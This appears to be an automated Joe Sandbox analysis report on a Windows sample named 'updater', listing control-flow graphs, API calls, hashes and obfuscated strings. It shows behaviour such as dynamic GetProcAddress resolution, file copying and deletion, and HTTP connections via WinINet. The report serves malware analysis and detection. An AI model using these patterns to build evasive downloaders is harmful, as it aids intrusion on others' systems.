                                    control_flow_graph 3752 13c2c33-13c2c52 call 1430cfc 3755 13c2c58-13c2cba call 13b347a call 13ce5d4 call 13cdd77 SetCurrentDirectoryA 3752->3755 3756 13c2f67-13c2f82 call 13cdf41 3752->3756 3765 13c2cbc-13c2cce call 140db91 3755->3765 3766 13c2cf6-13c2cfd 3755->3766 3765->3766 3773 13c2cd0-13c2cf5 call 140dfe8 call 140db47 3765->3773 3767 13c2d0e-13c2d23 call 13ce8c7 3766->3767 3768 13c2cff 3766->3768 3776 13c2d25 3767->3776 3777 13c2d27-13c2d42 LoadLibraryA call 13cdf41 3767->3777 3771 13c2d01-13c2d0c 3768->3771 3771->3767 3771->3771 3773->3766 3776->3777 3782 13c2f3d-13c2f5b SetCurrentDirectoryA call 13cdf41 3777->3782 3783 13c2d48-13c2d65 3777->3783 3789 13c2f60-13c2f65 3782->3789 3785 13c2d67-13c2d79 call 140db91 3783->3785 3786 13c2da0-13c2da7 3783->3786 3785->3786 3796 13c2d7b-13c2d9f call 140dfe8 call 140db47 3785->3796 3790 13c2db8-13c2df4 GetProcAddress 3786->3790 3791 13c2da9 3786->3791 3789->3756 3794 13c2e2f-13c2e36 3790->3794 3795 13c2df6-13c2e08 call 140db91 3790->3795 3793 13c2dab-13c2db6 3791->3793 3793->3790 3793->3793 3797 13c2e38 3794->3797 3798 13c2e47-13c2e75 GetProcAddress 3794->3798 3795->3794 3805 13c2e0a-13c2e2e call 13cd16e call 140dfe8 call 140db47 3795->3805 3796->3786 3801 13c2e3a-13c2e45 3797->3801 3802 13c2e77-13c2e89 call 140db91 3798->3802 3803 13c2eb0-13c2eb7 3798->3803 3801->3798 3801->3801 3802->3803 3819 13c2e8b-13c2eaf call 13cd67d call 140dfe8 call 140db47 3802->3819 3807 13c2eb9-13c2ec4 3803->3807 3808 13c2ec6-13c2eee GetProcAddress 3803->3808 3805->3794 3807->3807 3807->3808 3812 13c2f25-13c2f38 call 13cd30d GetProcAddress 3808->3812 3813 13c2ef0-13c2f03 call 140db91 3808->3813 3812->3782 3813->3812 3826 13c2f05-13c2f24 call 13cd327 call 140dfe8 call 140db47 3813->3826 3819->3803 3826->3812
                                    APIs
                                      • Part of subcall function 013B347A: ___std_fs_get_current_path@8.LIBCPMT ref: 013B34C9
                                      • Part of subcall function 013CDD77: _Deallocate.LIBCONCRT ref: 013CDD8C
                                    • SetCurrentDirectoryA.KERNEL32(?,?), ref: 013C2C8E
                                    • LoadLibraryA.KERNEL32(00000000), ref: 013C2D28
                                    • GetProcAddress.KERNEL32(01455BB8), ref: 013C2DC9
                                    • GetProcAddress.KERNEL32(014554AC), ref: 013C2ED1
                                    • GetProcAddress.KERNEL32(01454FE8), ref: 013C2E52
                                      • Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
                                      • Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9
                                    • GetProcAddress.KERNEL32(00000000), ref: 013C2F36
                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 013C2F56
                                      • Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
                                      • Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
                                      • Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCriticalProcSection$CurrentDirectoryEnterLeave$ConditionDeallocateLibraryLoadVariableWake___std_fs_get_current_path@8
                                    • String ID: BAZ.$K.$`}}q$eKW}
                                    • API String ID: 618739938-911188691
                                    • Opcode ID: 9d2c337945cf2e654e09a7f1538f2fc816a6a47b5f40d7cd1aa9bd4278c68d91
                                    • Instruction ID: 81a047134fefd58eb13080632185784e86ba3046365b0bfb9f2b624eb6323898
                                    • Opcode Fuzzy Hash: 9d2c337945cf2e654e09a7f1538f2fc816a6a47b5f40d7cd1aa9bd4278c68d91
                                    • Instruction Fuzzy Hash: 819116309043469BCB25EFFDD444AAEBBB0BF64714F24412EE550AB2B2DB74A984CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 3839 13f6531-13f6577 call 13f5c8d 3842 13f65da-13f65f4 call 13f64fd 3839->3842 3843 13f6579-13f6584 RemoveDirectoryW 3839->3843 3851 13f660e-13f662c 3842->3851 3852 13f65f6-13f660c call 13b1d6f 3842->3852 3845 13f6586-13f658f 3843->3845 3846 13f6594-13f659f GetLastError 3843->3846 3848 13f668a-13f6699 3845->3848 3849 13f65b4-13f65d5 GetLastError call 13b1d6f 3846->3849 3850 13f65a1-13f65ac DeleteFileW 3846->3850 3849->3848 3850->3845 3853 13f65ae GetLastError 3850->3853 3863 13f662e-13f6634 3851->3863 3864 13f6636-13f6641 GetLastError 3851->3864 3859 13f667b-13f6688 call 13f5d9c 3852->3859 3853->3849 3859->3848 3863->3859 3865 13f6653-13f666e SetFileInformationByHandle 3864->3865 3866 13f6643-13f6646 3864->3866 3865->3863 3871 13f6670-13f6673 GetLastError 3865->3871 3866->3865 3867 13f6648-13f664b 3866->3867 3867->3865 3868 13f664d-13f6651 3867->3868 3870 13f6679 3868->3870 3870->3859 3871->3870
                                    APIs
                                      • Part of subcall function 013F5C8D: GetModuleHandleW.KERNEL32(00000000,00000000,?,013F6317,01453954,kernel32.dll,GetFileInformationByHandleEx,013F5D5A,00000003,?,00000080,0143439A), ref: 013F5C9D
                                      • Part of subcall function 013F5C8D: GetProcAddress.KERNEL32(00000000,0143439A,?,013F6317,01453954,kernel32.dll,GetFileInformationByHandleEx,013F5D5A,00000003,?,00000080,0143439A), ref: 013F5CAB
                                    • RemoveDirectoryW.KERNEL32(00000000,01453958,kernel32.dll,SetFileInformationByHandle,013F5D5A,4350CDAC,?,?,?,00000000), ref: 013F657C
                                    • GetLastError.KERNEL32(?,?,00000000), ref: 013F6594
                                    • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 013F65A4
                                    • GetLastError.KERNEL32(?,?,00000000), ref: 013F65AE
                                    • GetLastError.KERNEL32(?,?,00000000), ref: 013F65B8
                                    • ___std_fs_open_handle@16.LIBCPMT ref: 013F65EB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$AddressDeleteDirectoryFileHandleModuleProcRemove___std_fs_open_handle@16
                                    • String ID: SetFileInformationByHandle$kernel32.dll
                                    • API String ID: 1377414829-82236170
                                    • Opcode ID: f256a772b29918bec7a1da713b68081d81e3de02a4d7452ff53fa9aa4cbc70d7
                                    • Instruction ID: a9934e1101a6050820a7dad30999e8bf7e158e036b4b957b14394659c12fc625
                                    • Opcode Fuzzy Hash: f256a772b29918bec7a1da713b68081d81e3de02a4d7452ff53fa9aa4cbc70d7
                                    • Instruction Fuzzy Hash: 964139F5A04108EBEB219B78CC4ABADBFF9AB44769F14402DFA01F2294DB748900C770
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 3872 14244f6-1424506 3873 1424520-1424522 3872->3873 3874 1424508-142451b call 1413c91 call 1413ca4 3872->3874 3875 1424887-1424894 call 1413c91 call 1413ca4 3873->3875 3876 1424528-142452e 3873->3876 3889 142489f 3874->3889 3893 142489a call 1413529 3875->3893 3876->3875 3880 1424534-142455a 3876->3880 3880->3875 3883 1424560-1424569 3880->3883 3886 1424583-1424585 3883->3886 3887 142456b-142457e call 1413c91 call 1413ca4 3883->3887 3891 1424883-1424885 3886->3891 3892 142458b-142458e 3886->3892 3887->3893 3894 14248a2-14248a5 3889->3894 3891->3894 3892->3891 3896 1424594-1424598 3892->3896 3893->3889 3896->3887 3899 142459a-14245b1 3896->3899 3900 1424602-1424608 3899->3900 3901 14245b3-14245b6 3899->3901 3905 142460a-1424614 3900->3905 3906 14245ce-14245e5 call 1413c91 call 1413ca4 call 1413529 3900->3906 3903 14245c6-14245cc 3901->3903 3904 14245b8-14245c1 3901->3904 3903->3906 3908 14245ea-14245fd 3903->3908 3907 1424686-1424696 3904->3907 3910 1424616-1424618 3905->3910 3911 142461b-1424639 call 142255c call 1420123 * 2 3905->3911 3938 14247ba 3906->3938 3913 142475b-1424764 call 142c903 3907->3913 3914 142469c-14246a8 3907->3914 3908->3907 3910->3911 3942 1424656-142467f call 142cafc 3911->3942 3943 142463b-1424651 call 1413ca4 call 1413c91 3911->3943 3927 1424766-1424778 3913->3927 3928 14247d7 3913->3928 3914->3913 3919 14246ae-14246b0 3914->3919 3919->3913 3920 14246b6-14246da 3919->3920 3920->3913 3924 14246dc-14246f2 3920->3924 3924->3913 3929 14246f4-14246f6 3924->3929 3927->3928 3933 142477a-1424789 GetConsoleMode 3927->3933 3931 14247db-14247f3 ReadFile 3928->3931 3929->3913 3934 14246f8-142471e 3929->3934 3936 14247f5-14247fb 3931->3936 3937 142484f-142485a GetLastError 3931->3937 3933->3928 3939 142478b-142478f 3933->3939 3934->3913 3941 1424720-1424736 3934->3941 3936->3937 3946 14247fd 3936->3946 3944 1424873-1424876 3937->3944 3945 142485c-142486e call 1413ca4 call 1413c91 3937->3945 3940 14247bd-14247c7 call 1420123 3938->3940 3939->3931 3947 1424791-14247ab ReadConsoleW 3939->3947 3940->3894 3941->3913 3949 1424738-142473a 3941->3949 3942->3907 3943->3938 3954 14247b3-14247b9 __dosmaperr 3944->3954 3955 142487c-142487e 3944->3955 3945->3938 3952 1424800-1424812 3946->3952 3956 14247cc-14247d5 3947->3956 3957 14247ad GetLastError 3947->3957 3949->3913 3959 142473c-1424756 3949->3959 3952->3940 3962 1424814-1424818 3952->3962 3954->3938 3955->3940 3956->3952 3957->3954 3959->3913 3966 1424831-142483c 3962->3966 3967 142481a-142482a call 1424210 3962->3967 3968 1424848-142484d call 142403f 3966->3968 3969 142483e call 1424367 3966->3969 3978 142482d-142482f 3967->3978 3976 1424843-1424846 3968->3976 3969->3976 3976->3978 3978->3940
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-3907804496
                                    • Opcode ID: 9da24808ffbe7992d9770c8249711059e595f2c0aac7f12997b8198f20ae076e
                                    • Instruction ID: 0e7d78a89880144e6bf3804266f0721c41115dc272c90a669554e5e8ff418050
                                    • Opcode Fuzzy Hash: 9da24808ffbe7992d9770c8249711059e595f2c0aac7f12997b8198f20ae076e
                                    • Instruction Fuzzy Hash: E5C10574A00255AFDF11DF9DD880BBEBBB0FF99310F48405AE555AB3A1D7709982CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 3979 142c47c-142c4ac call 142c1ca 3982 142c4c7-142c4d3 call 142900e 3979->3982 3983 142c4ae-142c4b9 call 1413c91 3979->3983 3988 142c4d5-142c4ea call 1413c91 call 1413ca4 3982->3988 3989 142c4ec-142c535 call 142c135 3982->3989 3990 142c4bb-142c4c2 call 1413ca4 3983->3990 3988->3990 3999 142c5a2-142c5ab GetFileType 3989->3999 4000 142c537-142c540 3989->4000 3997 142c7a1-142c7a5 3990->3997 4001 142c5f4-142c5f7 3999->4001 4002 142c5ad-142c5de GetLastError __dosmaperr CloseHandle 3999->4002 4004 142c542-142c546 4000->4004 4005 142c577-142c59d GetLastError __dosmaperr 4000->4005 4007 142c600-142c606 4001->4007 4008 142c5f9-142c5fe 4001->4008 4002->3990 4006 142c5e4-142c5ef call 1413ca4 4002->4006 4004->4005 4009 142c548-142c575 call 142c135 4004->4009 4005->3990 4006->3990 4011 142c60a-142c658 call 1428f59 4007->4011 4012 142c608 4007->4012 4008->4011 4009->3999 4009->4005 4018 142c677-142c69f call 142bee2 4011->4018 4019 142c65a-142c666 call 142c344 4011->4019 4012->4011 4025 142c6a1-142c6a2 4018->4025 4026 142c6a4-142c6e5 4018->4026 4019->4018 4024 142c668 4019->4024 4027 142c66a-142c672 call 14210e3 4024->4027 4025->4027 4028 142c706-142c714 4026->4028 4029 142c6e7-142c6eb 4026->4029 4027->3997 4032 142c71a-142c71e 4028->4032 4033 142c79f 4028->4033 4029->4028 4031 142c6ed-142c701 4029->4031 4031->4028 4032->4033 4035 142c720-142c753 CloseHandle call 142c135 4032->4035 4033->3997 4038 142c787-142c79b 4035->4038 4039 142c755-142c781 GetLastError __dosmaperr call 1429121 4035->4039 4038->4033 4039->4038
                                    APIs
                                      • Part of subcall function 0142C135: CreateFileW.KERNEL32(00000000,00000000,?,0142C525,?,?,00000000), ref: 0142C152
                                    • GetLastError.KERNEL32 ref: 0142C590
                                    • __dosmaperr.LIBCMT ref: 0142C597
                                    • GetFileType.KERNEL32 ref: 0142C5A3
                                    • GetLastError.KERNEL32 ref: 0142C5AD
                                    • __dosmaperr.LIBCMT ref: 0142C5B6
                                    • CloseHandle.KERNEL32(00000000), ref: 0142C5D6
                                    • CloseHandle.KERNEL32(01420CCF), ref: 0142C723
                                    • GetLastError.KERNEL32 ref: 0142C755
                                    • __dosmaperr.LIBCMT ref: 0142C75C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                    • String ID: H
                                    • API String ID: 4237864984-2852464175
                                    • Opcode ID: cfca05d0345371a461e08f821080b96da5eb013e53669f96784dad12c16ef8a5
                                    • Instruction ID: e19b0c2279e5553b58fd098182a1cfdcc3ff9ed903cd5ba12ad16c88b8ec9274
                                    • Opcode Fuzzy Hash: cfca05d0345371a461e08f821080b96da5eb013e53669f96784dad12c16ef8a5
                                    • Instruction Fuzzy Hash: 93A14532A001259FCF29DF7CDC91BAE7BB0AB46324F58015EE845AF3A1D7359982CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 4042 13bddc0-13bdeb7 call 1430cfc call 13b8f5d * 2 call 13ce8c7 call 13cfa3b call 13ce917 call 13cfa3b call 13cdf41 * 5 4067 13bdeb9-13bdecb call 140db91 4042->4067 4068 13bdef2-13bdef9 4042->4068 4067->4068 4079 13bdecd-13bdef1 call 140dfe8 call 140db47 4067->4079 4069 13bdefb 4068->4069 4070 13bdf0a-13bdf2d 4068->4070 4072 13bdefd-13bdf08 4069->4072 4073 13bdf6a-13bdf71 4070->4073 4074 13bdf2f-13bdf41 call 140db91 4070->4074 4072->4070 4072->4072 4076 13bdf73 4073->4076 4077 13bdf82-13bdfc7 call 13cda74 4073->4077 4074->4073 4086 13bdf43-13bdf69 call 140dfe8 call 140db47 4074->4086 4080 13bdf75-13bdf80 4076->4080 4088 13bdfc9-13bdfdc call 140db91 4077->4088 4089 13bdffe-13be005 4077->4089 4079->4068 4080->4077 4080->4080 4086->4073 4088->4089 4101 13bdfde-13bdffd call 13cd272 call 140dfe8 call 140db47 4088->4101 4091 13be007 4089->4091 4092 13be016-13be09e call 13cda74 call 13cbb72 call 13ce917 call 13cdf41 call 13cfec9 call 13b3174 call 13cdd77 4089->4092 4096 13be009-13be014 4091->4096 4121 13be1c9-13be23d call 13cfec9 call 13b3225 call 13cdd77 call 13cdf41 * 2 4092->4121 4122 13be0a4-13be0fe call 13cfec9 call 13b3225 call 13cdd77 CopyFileA 4092->4122 4096->4092 4096->4096 4101->4089 4122->4121 4135 13be104-13be144 4122->4135 4137 13be17b-13be182 4135->4137 4138 13be146-13be159 call 140db91 4135->4138 4141 13be193-13be1bf call 13b83df 4137->4141 4142 13be184 4137->4142 4138->4137 4149 13be15b-13be17a call 13cd1e6 call 140dfe8 call 140db47 4138->4149 4141->4121 4145 13be186-13be191 4142->4145 4145->4141 4145->4145 4149->4137
                                    APIs
                                      • Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50
                                      • Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
                                      • Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9
                                    • CopyFileA.KERNEL32 ref: 013BE0F6
                                      • Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
                                      • Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
                                      • Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                    • String ID: .$.$A\Kr$JOZ.$KZ$OZ$YOBB$rYOBBKZJOZ.
                                    • API String ID: 265086031-2949469555
                                    • Opcode ID: 3a0db48534a68b81d9821a6d35302cc676a69d29032dfab3257a5d0eb3268b1d
                                    • Instruction ID: 815ee9b39a0bc5eca3243bcc3e9027e32f96f8611dcf1b2adfc2b58ed26c8432
                                    • Opcode Fuzzy Hash: 3a0db48534a68b81d9821a6d35302cc676a69d29032dfab3257a5d0eb3268b1d
                                    • Instruction Fuzzy Hash: 85C10430D04289DFDB25EBE8D884BDDBBB0BF25314F24409ED5457B2A2EB705A89CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 4381 13bf68f-13bf786 call 1430cfc call 13b8f5d * 2 call 13ce8c7 call 13cfa3b call 13ce917 call 13cfa3b call 13cdf41 * 5 4406 13bf788-13bf79a call 140db91 4381->4406 4407 13bf7c1-13bf7c8 4381->4407 4406->4407 4418 13bf79c-13bf7c0 call 140dfe8 call 140db47 4406->4418 4408 13bf7ca 4407->4408 4409 13bf7d9-13bf7fc 4407->4409 4411 13bf7cc-13bf7d7 4408->4411 4412 13bf839-13bf840 4409->4412 4413 13bf7fe-13bf810 call 140db91 4409->4413 4411->4409 4411->4411 4415 13bf842 4412->4415 4416 13bf851-13bf89c call 13cda74 4412->4416 4413->4412 4425 13bf812-13bf838 call 140dfe8 call 140db47 4413->4425 4419 13bf844-13bf84f 4415->4419 4427 13bf89e-13bf8b1 call 140db91 4416->4427 4428 13bf8d3-13bf8da 4416->4428 4418->4407 4419->4416 4419->4419 4425->4412 4427->4428 4440 13bf8b3-13bf8d2 call 13cd1e6 call 140dfe8 call 140db47 4427->4440 4430 13bf8eb-13bf973 call 13cda74 call 13cbb72 call 13ce917 call 13cdf41 call 13cfec9 call 13b3174 call 13cdd77 4428->4430 4431 13bf8dc 4428->4431 4460 13bf979-13bf9d3 call 13cfec9 call 13b3225 call 13cdd77 CopyFileA 4430->4460 4461 13bfa94-13bfb08 call 13cfec9 call 13b3225 call 13cdd77 call 13cdf41 * 2 4430->4461 4435 13bf8de-13bf8e9 4431->4435 4435->4430 4435->4435 4440->4428 4460->4461 4475 13bf9d9-13bfa0f 4460->4475 4477 13bfa11-13bfa24 call 140db91 4475->4477 4478 13bfa46-13bfa4d 4475->4478 4477->4478 4488 13bfa26-13bfa45 call 13cd5ef call 140dfe8 call 140db47 4477->4488 4480 13bfa4f 4478->4480 4481 13bfa5e-13bfa8a call 13b83df 4478->4481 4484 13bfa51-13bfa5c 4480->4484 4481->4461 4484->4481 4484->4484 4488->4478
                                    APIs
                                      • Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50
                                      • Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
                                      • Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9
                                    • CopyFileA.KERNEL32 ref: 013BF9CB
                                      • Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
                                      • Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
                                      • Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                    • String ID: .$BKZ$G\$JOZ.$JOZ.$rYOB$rYOBBKZJOZ.
                                    • API String ID: 265086031-3370317137
                                    • Opcode ID: 5f6a6ce40f332a1d1eaf9eb85cd4499f1a1ad838b3b91bf1d5db43c313a7a509
                                    • Instruction ID: 38be2c8ef1c14ccfa904dc16f8fcde90acf86b94a2f82d8a86eabff0590456cd
                                    • Opcode Fuzzy Hash: 5f6a6ce40f332a1d1eaf9eb85cd4499f1a1ad838b3b91bf1d5db43c313a7a509
                                    • Instruction Fuzzy Hash: 81C1E530D0428ADEDB15EFE8C884BEDBBB0BF65704F14409ED5457B1A2EB705A49CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 4495 13cc44a-13cc488 call 1430cfc 4498 13cc4bf-13cc4c7 4495->4498 4499 13cc48a-13cc49d call 140db91 4495->4499 4500 13cc4d8-13cc536 InternetOpenA InternetConnectA 4498->4500 4501 13cc4c9 4498->4501 4499->4498 4507 13cc49f-13cc4be call 140dfe8 call 140db47 4499->4507 4505 13cc538-13cc54a call 140db91 4500->4505 4506 13cc575-13cc57b 4500->4506 4504 13cc4cb-13cc4d6 4501->4504 4504->4500 4504->4504 4505->4506 4518 13cc54c-13cc574 call 140dfe8 call 140db47 4505->4518 4508 13cc58c-13cc59e 4506->4508 4509 13cc57d 4506->4509 4507->4498 4513 13cc5da-13cc5e0 4508->4513 4514 13cc5a0-13cc5b2 call 140db91 4508->4514 4512 13cc57f-13cc58a 4509->4512 4512->4508 4512->4512 4519 13cc5f1-13cc64e HttpOpenRequestA 4513->4519 4520 13cc5e2 4513->4520 4514->4513 4529 13cc5b4-13cc5d9 call 140dfe8 call 140db47 4514->4529 4518->4506 4522 13cc685-13cc68c 4519->4522 4523 13cc650-13cc663 call 140db91 4519->4523 4521 13cc5e4-13cc5ef 4520->4521 4521->4519 4521->4521 4530 13cc69d-13cc6a2 4522->4530 4531 13cc68e 4522->4531 4523->4522 4540 13cc665-13cc684 call 13cd16e call 140dfe8 call 140db47 4523->4540 4529->4513 4533 13cc6a5-13cc6aa 4530->4533 4537 13cc690-13cc69b 4531->4537 4533->4533 4538 13cc6ac-13cc6c7 call 13ce052 call 13cc813 4533->4538 4537->4530 4537->4537 4552 13cc6c9 4538->4552 4553 13cc6d5-13cc6d7 4538->4553 4540->4522 4555 13cc6cb-13cc6d3 4552->4555 4556 13cc6da-13cc6df 4553->4556 4555->4553 4555->4555 4556->4556 4558 13cc6e1-13cc714 call 13ce052 4556->4558 4561 13cc74b-13cc752 4558->4561 4562 13cc716-13cc729 call 140db91 4558->4562 4563 13cc754 4561->4563 4564 13cc763-13cc768 4561->4564 4562->4561 4569 13cc72b-13cc74a call 13cd0f5 call 140dfe8 call 140db47 4562->4569 4566 13cc756-13cc761 4563->4566 4567 13cc76b-13cc770 4564->4567 4566->4564 4566->4566 4567->4567 4570 13cc772-13cc78d call 13ce052 call 13cc8b8 4567->4570 4569->4561 4579 13cc78f-13cc797 4570->4579 4580 13cc799-13cc79b 4570->4580 4579->4579 4579->4580 4582 13cc79e-13cc7a3 4580->4582 4582->4582 4584 13cc7a5-13cc812 call 13ce052 call 13cc2ca InternetCloseHandle * 3 call 13cdf41 * 2 4582->4584
                                    APIs
                                    • InternetOpenA.WININET(01454FBC,00000000,00000000,00000000,00000000), ref: 013CC4E1
                                    • InternetConnectA.WININET(00000000,01452A14,00000050,00000000,00000000,00000003,00000000,00000000), ref: 013CC507
                                    • HttpOpenRequestA.WININET(00000000,01454D5C,01454CFC,00000000,00000000,00000000,8468C200,00000000), ref: 013CC605
                                      • Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
                                      • Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9
                                      • Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
                                      • Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
                                      • Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB
                                    • InternetCloseHandle.WININET(~a}z), ref: 013CC7E8
                                    • InternetCloseHandle.WININET(?), ref: 013CC7ED
                                    • InternetCloseHandle.WININET(?), ref: 013CC7F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
